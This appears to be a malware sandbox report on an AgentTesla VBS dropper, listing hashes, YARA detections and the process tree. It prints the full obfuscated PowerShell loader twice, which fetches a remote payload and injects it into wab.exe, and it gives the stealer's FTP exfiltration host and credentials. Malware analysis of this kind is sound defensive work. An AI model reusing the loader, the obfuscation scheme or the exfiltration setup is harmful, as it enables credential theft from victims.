Analysis
-
max time kernel
140s -
max time network
146s -
platform
windows10-2004_x64 -
resource
win10v2004-20240426-en -
resource tags
arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system -
submitted
27-04-2024 01:31
Static task
static1
Behavioral task
behavioral1
Sample
94ffc7bec0cef06550d739bc5014a3232c9218a50524de0464b53b6dbbd7ed5f.vbs
Resource
win7-20240215-en
Behavioral task
behavioral2
Sample
94ffc7bec0cef06550d739bc5014a3232c9218a50524de0464b53b6dbbd7ed5f.vbs
Resource
win10v2004-20240426-en
General
-
Target
94ffc7bec0cef06550d739bc5014a3232c9218a50524de0464b53b6dbbd7ed5f.vbs
-
Size
59KB
-
MD5
3c00879a0e4e4a7d7b78bb8611bcc94f
-
SHA1
3ddd2f54b7fb54df60134318515fd61b119bc46f
-
SHA256
94ffc7bec0cef06550d739bc5014a3232c9218a50524de0464b53b6dbbd7ed5f
-
SHA512
4dfce826cf9f7456dd981b4a1b4c985d75c9c849434a94c5987bd08fe037217b5160441e23072c498b5e9c93e2d00d8c6e814ea1736e68724aa461881ab1b31c
-
SSDEEP
1536:cdukLI1gPDPTxyk0MfFCNqnlAEfen8TCQr:Yukk1gPDJzoGaEWn8Tv
Malware Config
Extracted
agenttesla
Protocol: ftp- Host:
ftp://ftp.concaribe.com - Port:
21 - Username:
[email protected] - Password:
2ogFj^8ECV(?
Signatures
-
AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
-
Detect packed .NET executables. Mostly AgentTeslaV4. 2 IoCs
Processes:
resource yara_rule behavioral2/memory/1036-43-0x0000000000AC0000-0x0000000001D14000-memory.dmp INDICATOR_EXE_Packed_GEN01 behavioral2/memory/1036-44-0x0000000000AC0000-0x0000000000B02000-memory.dmp INDICATOR_EXE_Packed_GEN01 -
Detects binaries (Windows and macOS) referencing many web browsers. Observed in information stealers. 2 IoCs
Processes:
resource yara_rule behavioral2/memory/1036-43-0x0000000000AC0000-0x0000000001D14000-memory.dmp INDICATOR_SUSPICIOUS_Binary_References_Browsers behavioral2/memory/1036-44-0x0000000000AC0000-0x0000000000B02000-memory.dmp INDICATOR_SUSPICIOUS_Binary_References_Browsers -
Detects executables referencing Windows vault credential objects. Observed in infostealers 2 IoCs
Processes:
resource yara_rule behavioral2/memory/1036-43-0x0000000000AC0000-0x0000000001D14000-memory.dmp INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID behavioral2/memory/1036-44-0x0000000000AC0000-0x0000000000B02000-memory.dmp INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID -
Detects executables referencing many confidential data stores found in browsers, mail clients, cryptocurreny wallets, etc. Observed in information stealers 2 IoCs
Processes:
resource yara_rule behavioral2/memory/1036-43-0x0000000000AC0000-0x0000000001D14000-memory.dmp INDICATOR_SUSPICIOUS_EXE_References_Confidential_Data_Store behavioral2/memory/1036-44-0x0000000000AC0000-0x0000000000B02000-memory.dmp INDICATOR_SUSPICIOUS_EXE_References_Confidential_Data_Store -
Detects executables referencing many email and collaboration clients. Observed in information stealers 2 IoCs
Processes:
resource yara_rule behavioral2/memory/1036-43-0x0000000000AC0000-0x0000000001D14000-memory.dmp INDICATOR_SUSPICIOUS_EXE_References_Messaging_Clients behavioral2/memory/1036-44-0x0000000000AC0000-0x0000000000B02000-memory.dmp INDICATOR_SUSPICIOUS_EXE_References_Messaging_Clients -
Detects executables referencing many file transfer clients. Observed in information stealers 2 IoCs
Processes:
resource yara_rule behavioral2/memory/1036-43-0x0000000000AC0000-0x0000000001D14000-memory.dmp INDICATOR_SUSPICIOUS_EXE_Referenfces_File_Transfer_Clients behavioral2/memory/1036-44-0x0000000000AC0000-0x0000000000B02000-memory.dmp INDICATOR_SUSPICIOUS_EXE_Referenfces_File_Transfer_Clients -
Blocklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 5 1680 powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
WScript.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000\Control Panel\International\Geo\Nation WScript.exe -
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 17 api.ipify.org 18 api.ipify.org -
Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
Processes:
wab.exepid process 1036 wab.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
Processes:
powershell.exewab.exepid process 4868 powershell.exe 1036 wab.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
powershell.exedescription pid process target process PID 4868 set thread context of 1036 4868 powershell.exe wab.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Runs ping.exe 1 TTPs 2 IoCs
-
Suspicious behavior: EnumeratesProcesses 7 IoCs
Processes:
powershell.exepowershell.exewab.exepid process 1680 powershell.exe 1680 powershell.exe 4868 powershell.exe 4868 powershell.exe 4868 powershell.exe 1036 wab.exe 1036 wab.exe -
Suspicious behavior: MapViewOfSection 1 IoCs
Processes:
powershell.exepid process 4868 powershell.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
Processes:
powershell.exepowershell.exewab.exedescription pid process Token: SeDebugPrivilege 1680 powershell.exe Token: SeDebugPrivilege 4868 powershell.exe Token: SeDebugPrivilege 1036 wab.exe -
Suspicious use of WriteProcessMemory 21 IoCs
Processes:
WScript.exepowershell.exepowershell.exedescription pid process target process PID 4056 wrote to memory of 540 4056 WScript.exe ping.exe PID 4056 wrote to memory of 540 4056 WScript.exe ping.exe PID 4056 wrote to memory of 3880 4056 WScript.exe ping.exe PID 4056 wrote to memory of 3880 4056 WScript.exe ping.exe PID 4056 wrote to memory of 4676 4056 WScript.exe cmd.exe PID 4056 wrote to memory of 4676 4056 WScript.exe cmd.exe PID 4056 wrote to memory of 1680 4056 WScript.exe powershell.exe PID 4056 wrote to memory of 1680 4056 WScript.exe powershell.exe PID 1680 wrote to memory of 3312 1680 powershell.exe cmd.exe PID 1680 wrote to memory of 3312 1680 powershell.exe cmd.exe PID 1680 wrote to memory of 4868 1680 powershell.exe powershell.exe PID 1680 wrote to memory of 4868 1680 powershell.exe powershell.exe PID 1680 wrote to memory of 4868 1680 powershell.exe powershell.exe PID 4868 wrote to memory of 3416 4868 powershell.exe cmd.exe PID 4868 wrote to memory of 3416 4868 powershell.exe cmd.exe PID 4868 wrote to memory of 3416 4868 powershell.exe cmd.exe PID 4868 wrote to memory of 1036 4868 powershell.exe wab.exe PID 4868 wrote to memory of 1036 4868 powershell.exe wab.exe PID 4868 wrote to memory of 1036 4868 powershell.exe wab.exe PID 4868 wrote to memory of 1036 4868 powershell.exe wab.exe PID 4868 wrote to memory of 1036 4868 powershell.exe wab.exe
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\94ffc7bec0cef06550d739bc5014a3232c9218a50524de0464b53b6dbbd7ed5f.vbs"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\ping.exeping google.com -n 12⤵
- Runs ping.exe
-
C:\Windows\System32\ping.exeping %.%.%.%2⤵
- Runs ping.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c dir2⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Dragonwort = 1;$Vad='Substrin';$Vad+='g';Function Forfatterskaberne($Honnren){$Naeppe=$Honnren.Length-$Dragonwort;For($Tyndhudet=5; $Tyndhudet -lt $Naeppe; $Tyndhudet+=(6)){$Anticipants+=$Honnren.$Vad.Invoke($Tyndhudet, $Dragonwort);}$Anticipants;}function Flelsessagers167($baitfish){. ($Statsls) ($baitfish);}$Noncritical84=Forfatterskaberne 'Ni.roM D mmoGaasezBrandi N.dklFrokolMercaaSiv.n/Ensw.5Glaci. Berm0Nring Teate(ArntpWKnickiDkninnPlessdDeducoRepetwmahonsC vil KilowNP omoT,adly Sejse1Forlg0Klond.Menya0Paata;Cosse SorteW C.rei,urkin sade6P,tel4Stoni;Bysba Lettex C no6 Folk4Adhak;Fis,i weedrAabenv Voks:Capan1Res z2Nonpo1 Wird.Dront0Hasse) Inte VauntGStikle.evercVemodkErhveoNeogr/Praef2Forep0A dem1Val,i0 Held0Takt.1Nontr0R,gne1slbsa ParagFJenviiClearrRigore rullfCircuoLid oxSymme/ Band1Amfib2sho p1Minds.L.est0Tude. ';$Systemgrafs=Forfatterskaberne 'ErnriU D scs KunseA tiqrPolit-tjavsA SpndgtaxieeS.bvenArabet Dece ';$Bewhite=Forfatterskaberne 'EndanhWadmat Illat annap Gyre:Delig/ Unfl/B mbanElbiliRateft in eiDtrenoArkol. .nurcord.noRestamShoeb/ K,erk Supe2Komma/BregoUHandenWaterc ForwoPoindnshrafsPancrc.iffsiBrydne Convn.utsutPulloiJomfroUningu LodgsToolmn.etaleSpilfsVittus Gunv.Conc.jSamvrp.nddkbEndoc ';$Foelsomhed=Forfatterskaberne 'Extra>Alkoh ';$Statsls=Forfatterskaberne 'Re,nui KandeHust.x.indu ';$Soil='Bureaucratizes';Flelsessagers167 (Forfatterskaberne 'SuperSThroue Bl atEneka-Unde.CSavtaoBibl.n UbiqtRedekeEnkeln ucert Lime Has,e-forbuPkludra AdvotminimhSpl.t Mu.tiTNvnin:Kan.n\ ommeAIdeoln Pewet.jlleiAbdietNedkuyDorsipBeclio PissuBrystsImmob.MelletAlactxB nzetOverp Misfo- CincV lupuaUltralTre.muNum.eeUnive Ign,t$ uskuSmelano gleri UndelSume.; Na,u ');Flelsessagers167 (Forfatterskaberne 'MetafiMaskif Sheo Smaa(GerbrtRaneeeAcquisNitritD.mme-DivispstewaaShooptAmt fhButtl BoxinTBioxa: Gr n\futurAEthionKorrotLdervi LengtStor,y,arvepSyneroSmrreuKiwifsWebbe.Papagtendowxmisfot Citr)Hoved{ RedseDextrxtrachiTrochtDrnle}.ctor;Benda ');$Plumipede107 = Forfatterskaberne ' OmsteSqsamcTone.hLodlioProli Hvnen%snksmaUnexapDumstpRigsmdCo ntaRenipt FrigaHanke% Smil\ B.rdVKa.meeSe sur Uhe.eBranddHippoiMbirac Bildt.eget.Unprem RegiocoleouTroll S gte&Afkry&Magia F.odeNatioc N.nphPulpioPreco ulli$ Deod ';Flelsessagers167 (Forfatterskaberne 'Coe o$Inchag AsaflTriumoTrettbUngraa urfl Alun:ThaniHTab reskar,arosarrSpaentGeot.gKontrr Vrt i DyrseStoddfFakul=Dagge( Te,ecJaspimSkat,dBeeth Udst./Pr.srcOverh Dees$ OpspPAf.ikl FireuArsenmVksthinukesp Dexte DebwdAntere,rocn1Fortn0Print7Stila) .nds ');Flelsessagers167 (Forfatterskaberne ' U kr$ Vagtg TalllMagniodis.ebStockaRet.rlPseud: arisJBarder,eskfeShan nMand,= lanc$SwowmB St feUnderwBl myhmarduiT.avstCharyeCatar.KontasVildfpNaganl ggesiAle.atIndsn(No eq$PrebeFUmiacoDyk,eekonfolBlacksNordvoKolormDiscohScolee Linnd Fabr)Semig ');$Bewhite=$Jren[0];Flelsessagers167 (Forfatterskaberne 'Lokal$StrmfgUsurplWay,ioForhab mdiraHovedlOverd:Pa,peRTrakkeEr,antSubhes KampsMatchi CohokMumpikSkibseR.tirrInforhNonfeeBarled Recoe.rescnBe oos Un,e=FunicN SknneAllydwCushb-HaandONomeub ToiljV dneeJokercPorthtAphon enthrSRadixySuttes,nsubtTerateEuropmL,ndl.AutenN .rubeLamedt,etfi.Lap.aW Fr teSvmmebNedsvC DelilOm leiAcclieMareknInkast,nter ');Flelsessagers167 (Forfatterskaberne 'Bu im$TraveRBarfoe HodotImpacsO,isssTrbesidrikkk .nenkLondieE,terrFr,mbhOptraeStududK yose Da.anSm rosHete..JobsgHBaggreUnperaReinad Laere SerorDybfrswe,tb[Sprud$CoregSBri,hy,odessKnkketTryl e Cheem Phy,gLok.er ,lluaintegfTradis Alge]Unde,=Epina$UnsepNla ceoSum.onReveicMilierF.uori ommtKalifiVibr c U ifa UdpelChor.8 Eksp4Musel ');$Bakteriologierne=Forfatterskaberne 'IodhyRTrnereschn tBoucls tebastol,mi Retsku.remk PseueDialyrPo,olhLar.seCre.edStorteLim enRu,anssplit.udsmuDwarpooParn,wInsatnTjrehlCruseoOutraaNidi,dByforFHunkniUsy,llDom,meStoma(Forst$GenfoBPirojeOverrwAktivhTrindi Al.rtBllere Trou,Pupp,$ WeinsKin su QuidbE,cinjUnr.me Ag icCal ptSy thiBoo.hoAv,can efisBla,t)Unaus ';$Bakteriologierne=$Heartgrief[1]+$Bakteriologierne;$subjections=$Heartgrief[0];Flelsessagers167 (Forfatterskaberne ' Unva$Clam,gnormklGataao DekobdrninaInsiplPlect:Stym EAdfrdl VaresIchthaDrnfa= klub( Mil T Ci,ieTabansIndh,tSmuds-BrudnPGangwaStubmtGimpihDystr Comp$TelessSydgau Tranb,hospjLev.veManufc SqustVasociElecto ravenBregnsD,kke)Arbej ');while (!$Elsa) {Flelsessagers167 (Forfatterskaberne 'Si us$LyssigPulerlKlupuoVexi.bAntheaCyanolR fle:MargeN PhotoBehann .recbPowdeaTud,ksExceriEft,rnMarcigDatak3Trold5Rette=Brevf$ParoctknuserAmat,uConsteT ivi ') ;Flelsessagers167 $Bakteriologierne;Flelsessagers167 (Forfatterskaberne 'FatniS.yroatMargeao.thorSkoletDegre-stockSHu.knlShamee PotaeLsepepHo ed A,tst4Ta.ov ');Flelsessagers167 (Forfatterskaberne 'Hyb i$Denigg PerclForsvoRec,obUnodoa Dr mlReobl:malleE,ntihlS.rsosRutefaCarfa=nytes(FuldfTPhotoeEug,esR,kistAnr.t- DetrP,recoaOdon t GavshCo,ed Egmu $GormasRigs.uTilrabaglosj ArbeeStde.cBiogetKalkuiGilbeoLegemnDi,gosfusio)walis ') ;Flelsessagers167 (Forfatterskaberne ' iffe$ T.nngVkkeul Fibeo NaevbGaincaSy,telfesta:OverbF Pip,oValgfrmontelKultiyThysag StiltKnipleSprosrenga.n Tr meDelussHde s= Ence$DemisgR caglFarseoPartrbEthe.aBeaanldross:SurveVSp jdieditetTeddceRosvrlPolarlHyperaZuniarOv rci Di.tuPedotmTrumf8Bra.n9 Fert+Homil+Boate%Uter.$Hy erJFall,rBo,gie BrownWood .NonercVergeoParasuSeas nDubiotnedga ') ;$Bewhite=$Jren[$Forlygternes];}Flelsessagers167 (Forfatterskaberne ' Ra.e$Adolfg DruplVid oo jamabOplsfa,wvenl Naug:roofyfS,ercj WidieAn.jalTattidKol.i Hj.mm= Hair UnicoG Smaae tasstDr.ft-cren.CPartioAreeln WaxwtNona.eSammen.nwratEm,ti Tusch$TamelsS,rikuAtt nbPodsojHeathekommacAccentMisapi OphaoGenglnDruses irke ');Flelsessagers167 (Forfatterskaberne 'Kardi$BarspgFactol HypooF,skebWim,laAwr slKarlj:UnperI OptrmCosmomdukavaBizartNotearAfsigiLnpotk,aleauoppakl.lufseForurr ArnaiProrinProstgForbeeBedrerExter Dekon=.nnih Luzul[MotorSC.rsty,ments ProttM,kroe R stmlokal.ScythCBascioRibbenGengivEks,le .istr PrmitUnrec]Rubbi: pern:Ank.rFSolhar AcicoAndelmS,parBCremea TownsProceeLi,en6Undli4SlagsSPantstFd elrUnhomi.ectan ,enigAer n(primr$ KejsfByggrjHu oreProcolProjedUtopi)C ffe ');Flelsessagers167 (Forfatterskaberne 'Empye$,onpegGaunclQui,do AcarbKnip,aVoliplSejoi:HomunRConsueR sprcCam hoAu.itnResurtIdkoreStranmFerripAdrielunfraaLabeltUnd,riForgroForbrnMonop Flo,e= prea Subpe[CancrS UkrnyTithasHexamt iodee ForpmVselm.PinewTPondeeStagnxBreittFi,mo.KoppeEBromfnVve,ecExpenoBr,stdHushoiRapson Progg Regi]Supe.: Kolo:SeverAOilmoSMisi CV.locIs,iseIKn ge.PusseGPupate efeat SeklSSystet,peakrClituiIndren Ins.gPercu( Fors$SelvmI.entrm,arvemPolaraM.ndst,forgr Ajugi CacokKatodu Narrl RowleImperrUrpreiStagin Mod gBarnae yriarVrdig)Pimpl ');Flelsessagers167 (Forfatterskaberne 'Empir$Id,lsgMiljalBes.loVed.abPedi.a PaaflFrimu:AlecttGldspoUpstrnPrl,daZoogerNon,ut .ffie DistrStu,in ReareKmmen=,allo$NringRLaidle U.frc B fro oelnHypnotOmkrae R.hamKybelpCr.stlBlawnarepubtLingui ovioS,ijonF.yve. IdrisStemnuMora,bPallasfaithtWeekerPree,iSansenDilatg Form( Grns3Klink0Tyrek1.rveg7.rede8 Emul5.atto,ins e2Slupp8.avvr7 mbit4 K.nt7 cypr)Ov,rs ');Flelsessagers167 $tonarterne;"2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Veredict.mou && echo $"3⤵
-
C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Dragonwort = 1;$Vad='Substrin';$Vad+='g';Function Forfatterskaberne($Honnren){$Naeppe=$Honnren.Length-$Dragonwort;For($Tyndhudet=5; $Tyndhudet -lt $Naeppe; $Tyndhudet+=(6)){$Anticipants+=$Honnren.$Vad.Invoke($Tyndhudet, $Dragonwort);}$Anticipants;}function Flelsessagers167($baitfish){. ($Statsls) ($baitfish);}$Noncritical84=Forfatterskaberne 'Ni.roM D mmoGaasezBrandi N.dklFrokolMercaaSiv.n/Ensw.5Glaci. Berm0Nring Teate(ArntpWKnickiDkninnPlessdDeducoRepetwmahonsC vil KilowNP omoT,adly Sejse1Forlg0Klond.Menya0Paata;Cosse SorteW C.rei,urkin sade6P,tel4Stoni;Bysba Lettex C no6 Folk4Adhak;Fis,i weedrAabenv Voks:Capan1Res z2Nonpo1 Wird.Dront0Hasse) Inte VauntGStikle.evercVemodkErhveoNeogr/Praef2Forep0A dem1Val,i0 Held0Takt.1Nontr0R,gne1slbsa ParagFJenviiClearrRigore rullfCircuoLid oxSymme/ Band1Amfib2sho p1Minds.L.est0Tude. ';$Systemgrafs=Forfatterskaberne 'ErnriU D scs KunseA tiqrPolit-tjavsA SpndgtaxieeS.bvenArabet Dece ';$Bewhite=Forfatterskaberne 'EndanhWadmat Illat annap Gyre:Delig/ Unfl/B mbanElbiliRateft in eiDtrenoArkol. .nurcord.noRestamShoeb/ K,erk Supe2Komma/BregoUHandenWaterc ForwoPoindnshrafsPancrc.iffsiBrydne Convn.utsutPulloiJomfroUningu LodgsToolmn.etaleSpilfsVittus Gunv.Conc.jSamvrp.nddkbEndoc ';$Foelsomhed=Forfatterskaberne 'Extra>Alkoh ';$Statsls=Forfatterskaberne 'Re,nui KandeHust.x.indu ';$Soil='Bureaucratizes';Flelsessagers167 (Forfatterskaberne 'SuperSThroue Bl atEneka-Unde.CSavtaoBibl.n UbiqtRedekeEnkeln ucert Lime Has,e-forbuPkludra AdvotminimhSpl.t Mu.tiTNvnin:Kan.n\ ommeAIdeoln Pewet.jlleiAbdietNedkuyDorsipBeclio PissuBrystsImmob.MelletAlactxB nzetOverp Misfo- CincV lupuaUltralTre.muNum.eeUnive Ign,t$ uskuSmelano gleri UndelSume.; Na,u ');Flelsessagers167 (Forfatterskaberne 'MetafiMaskif Sheo Smaa(GerbrtRaneeeAcquisNitritD.mme-DivispstewaaShooptAmt fhButtl BoxinTBioxa: Gr n\futurAEthionKorrotLdervi LengtStor,y,arvepSyneroSmrreuKiwifsWebbe.Papagtendowxmisfot Citr)Hoved{ RedseDextrxtrachiTrochtDrnle}.ctor;Benda ');$Plumipede107 = Forfatterskaberne ' OmsteSqsamcTone.hLodlioProli Hvnen%snksmaUnexapDumstpRigsmdCo ntaRenipt FrigaHanke% Smil\ B.rdVKa.meeSe sur Uhe.eBranddHippoiMbirac Bildt.eget.Unprem RegiocoleouTroll S gte&Afkry&Magia F.odeNatioc N.nphPulpioPreco ulli$ Deod ';Flelsessagers167 (Forfatterskaberne 'Coe o$Inchag AsaflTriumoTrettbUngraa urfl Alun:ThaniHTab reskar,arosarrSpaentGeot.gKontrr Vrt i DyrseStoddfFakul=Dagge( Te,ecJaspimSkat,dBeeth Udst./Pr.srcOverh Dees$ OpspPAf.ikl FireuArsenmVksthinukesp Dexte DebwdAntere,rocn1Fortn0Print7Stila) .nds ');Flelsessagers167 (Forfatterskaberne ' U kr$ Vagtg TalllMagniodis.ebStockaRet.rlPseud: arisJBarder,eskfeShan nMand,= lanc$SwowmB St feUnderwBl myhmarduiT.avstCharyeCatar.KontasVildfpNaganl ggesiAle.atIndsn(No eq$PrebeFUmiacoDyk,eekonfolBlacksNordvoKolormDiscohScolee Linnd Fabr)Semig ');$Bewhite=$Jren[0];Flelsessagers167 (Forfatterskaberne 'Lokal$StrmfgUsurplWay,ioForhab mdiraHovedlOverd:Pa,peRTrakkeEr,antSubhes KampsMatchi CohokMumpikSkibseR.tirrInforhNonfeeBarled Recoe.rescnBe oos Un,e=FunicN SknneAllydwCushb-HaandONomeub ToiljV dneeJokercPorthtAphon enthrSRadixySuttes,nsubtTerateEuropmL,ndl.AutenN .rubeLamedt,etfi.Lap.aW Fr teSvmmebNedsvC DelilOm leiAcclieMareknInkast,nter ');Flelsessagers167 (Forfatterskaberne 'Bu im$TraveRBarfoe HodotImpacsO,isssTrbesidrikkk .nenkLondieE,terrFr,mbhOptraeStududK yose Da.anSm rosHete..JobsgHBaggreUnperaReinad Laere SerorDybfrswe,tb[Sprud$CoregSBri,hy,odessKnkketTryl e Cheem Phy,gLok.er ,lluaintegfTradis Alge]Unde,=Epina$UnsepNla ceoSum.onReveicMilierF.uori ommtKalifiVibr c U ifa UdpelChor.8 Eksp4Musel ');$Bakteriologierne=Forfatterskaberne 'IodhyRTrnereschn tBoucls tebastol,mi Retsku.remk PseueDialyrPo,olhLar.seCre.edStorteLim enRu,anssplit.udsmuDwarpooParn,wInsatnTjrehlCruseoOutraaNidi,dByforFHunkniUsy,llDom,meStoma(Forst$GenfoBPirojeOverrwAktivhTrindi Al.rtBllere Trou,Pupp,$ WeinsKin su QuidbE,cinjUnr.me Ag icCal ptSy thiBoo.hoAv,can efisBla,t)Unaus ';$Bakteriologierne=$Heartgrief[1]+$Bakteriologierne;$subjections=$Heartgrief[0];Flelsessagers167 (Forfatterskaberne ' Unva$Clam,gnormklGataao DekobdrninaInsiplPlect:Stym EAdfrdl VaresIchthaDrnfa= klub( Mil T Ci,ieTabansIndh,tSmuds-BrudnPGangwaStubmtGimpihDystr Comp$TelessSydgau Tranb,hospjLev.veManufc SqustVasociElecto ravenBregnsD,kke)Arbej ');while (!$Elsa) {Flelsessagers167 (Forfatterskaberne 'Si us$LyssigPulerlKlupuoVexi.bAntheaCyanolR fle:MargeN PhotoBehann .recbPowdeaTud,ksExceriEft,rnMarcigDatak3Trold5Rette=Brevf$ParoctknuserAmat,uConsteT ivi ') ;Flelsessagers167 $Bakteriologierne;Flelsessagers167 (Forfatterskaberne 'FatniS.yroatMargeao.thorSkoletDegre-stockSHu.knlShamee PotaeLsepepHo ed A,tst4Ta.ov ');Flelsessagers167 (Forfatterskaberne 'Hyb i$Denigg PerclForsvoRec,obUnodoa Dr mlReobl:malleE,ntihlS.rsosRutefaCarfa=nytes(FuldfTPhotoeEug,esR,kistAnr.t- DetrP,recoaOdon t GavshCo,ed Egmu $GormasRigs.uTilrabaglosj ArbeeStde.cBiogetKalkuiGilbeoLegemnDi,gosfusio)walis ') ;Flelsessagers167 (Forfatterskaberne ' iffe$ T.nngVkkeul Fibeo NaevbGaincaSy,telfesta:OverbF Pip,oValgfrmontelKultiyThysag StiltKnipleSprosrenga.n Tr meDelussHde s= Ence$DemisgR caglFarseoPartrbEthe.aBeaanldross:SurveVSp jdieditetTeddceRosvrlPolarlHyperaZuniarOv rci Di.tuPedotmTrumf8Bra.n9 Fert+Homil+Boate%Uter.$Hy erJFall,rBo,gie BrownWood .NonercVergeoParasuSeas nDubiotnedga ') ;$Bewhite=$Jren[$Forlygternes];}Flelsessagers167 (Forfatterskaberne ' Ra.e$Adolfg DruplVid oo jamabOplsfa,wvenl Naug:roofyfS,ercj WidieAn.jalTattidKol.i Hj.mm= Hair UnicoG Smaae tasstDr.ft-cren.CPartioAreeln WaxwtNona.eSammen.nwratEm,ti Tusch$TamelsS,rikuAtt nbPodsojHeathekommacAccentMisapi OphaoGenglnDruses irke ');Flelsessagers167 (Forfatterskaberne 'Kardi$BarspgFactol HypooF,skebWim,laAwr slKarlj:UnperI OptrmCosmomdukavaBizartNotearAfsigiLnpotk,aleauoppakl.lufseForurr ArnaiProrinProstgForbeeBedrerExter Dekon=.nnih Luzul[MotorSC.rsty,ments ProttM,kroe R stmlokal.ScythCBascioRibbenGengivEks,le .istr PrmitUnrec]Rubbi: pern:Ank.rFSolhar AcicoAndelmS,parBCremea TownsProceeLi,en6Undli4SlagsSPantstFd elrUnhomi.ectan ,enigAer n(primr$ KejsfByggrjHu oreProcolProjedUtopi)C ffe ');Flelsessagers167 (Forfatterskaberne 'Empye$,onpegGaunclQui,do AcarbKnip,aVoliplSejoi:HomunRConsueR sprcCam hoAu.itnResurtIdkoreStranmFerripAdrielunfraaLabeltUnd,riForgroForbrnMonop Flo,e= prea Subpe[CancrS UkrnyTithasHexamt iodee ForpmVselm.PinewTPondeeStagnxBreittFi,mo.KoppeEBromfnVve,ecExpenoBr,stdHushoiRapson Progg Regi]Supe.: Kolo:SeverAOilmoSMisi CV.locIs,iseIKn ge.PusseGPupate efeat SeklSSystet,peakrClituiIndren Ins.gPercu( Fors$SelvmI.entrm,arvemPolaraM.ndst,forgr Ajugi CacokKatodu Narrl RowleImperrUrpreiStagin Mod gBarnae yriarVrdig)Pimpl ');Flelsessagers167 (Forfatterskaberne 'Empir$Id,lsgMiljalBes.loVed.abPedi.a PaaflFrimu:AlecttGldspoUpstrnPrl,daZoogerNon,ut .ffie DistrStu,in ReareKmmen=,allo$NringRLaidle U.frc B fro oelnHypnotOmkrae R.hamKybelpCr.stlBlawnarepubtLingui ovioS,ijonF.yve. IdrisStemnuMora,bPallasfaithtWeekerPree,iSansenDilatg Form( Grns3Klink0Tyrek1.rveg7.rede8 Emul5.atto,ins e2Slupp8.avvr7 mbit4 K.nt7 cypr)Ov,rs ');Flelsessagers167 $tonarterne;"3⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Veredict.mou && echo $"4⤵
-
C:\Program Files (x86)\windows mail\wab.exe"C:\Program Files (x86)\windows mail\wab.exe"4⤵
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v13
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_t2x0dymh.qnj.ps1Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
C:\Users\Admin\AppData\Roaming\Veredict.mouFilesize
430KB
MD5446bd53386a67b6e402c67f8077b3a9e
SHA111d006e1c77dddfff4559bef35ec15bd01fb8cbc
SHA25685f74a4e42fd58c712bfce653b8eb1d71c57793e22daf9529c7c916c4660dfc4
SHA5121afae58e5cbedc6c2aaa7779bb9217f1cf00aff240a9bdbdc41394a30cc1bd59181a83c8fd62fb636d34b0be41cb8a277c64c9126d52881324cbcff27753e838
-
memory/1036-43-0x0000000000AC0000-0x0000000001D14000-memory.dmpFilesize
18.3MB
-
memory/1036-44-0x0000000000AC0000-0x0000000000B02000-memory.dmpFilesize
264KB
-
memory/1036-47-0x0000000023F50000-0x0000000023FA0000-memory.dmpFilesize
320KB
-
memory/1036-49-0x0000000023F40000-0x0000000023F4A000-memory.dmpFilesize
40KB
-
memory/1036-48-0x0000000024640000-0x00000000246D2000-memory.dmpFilesize
584KB
-
memory/1680-12-0x000002A284FD0000-0x000002A284FE0000-memory.dmpFilesize
64KB
-
memory/1680-10-0x00007FF883830000-0x00007FF8842F1000-memory.dmpFilesize
10.8MB
-
memory/1680-46-0x00007FF883830000-0x00007FF8842F1000-memory.dmpFilesize
10.8MB
-
memory/1680-11-0x000002A284FD0000-0x000002A284FE0000-memory.dmpFilesize
64KB
-
memory/1680-9-0x000002A285230000-0x000002A285252000-memory.dmpFilesize
136KB
-
memory/1680-41-0x000002A284FD0000-0x000002A284FE0000-memory.dmpFilesize
64KB
-
memory/1680-42-0x000002A284FD0000-0x000002A284FE0000-memory.dmpFilesize
64KB
-
memory/1680-40-0x00007FF883830000-0x00007FF8842F1000-memory.dmpFilesize
10.8MB
-
memory/4868-17-0x0000000004F20000-0x0000000004F42000-memory.dmpFilesize
136KB
-
memory/4868-35-0x00000000064E0000-0x0000000006502000-memory.dmpFilesize
136KB
-
memory/4868-36-0x0000000008370000-0x0000000008914000-memory.dmpFilesize
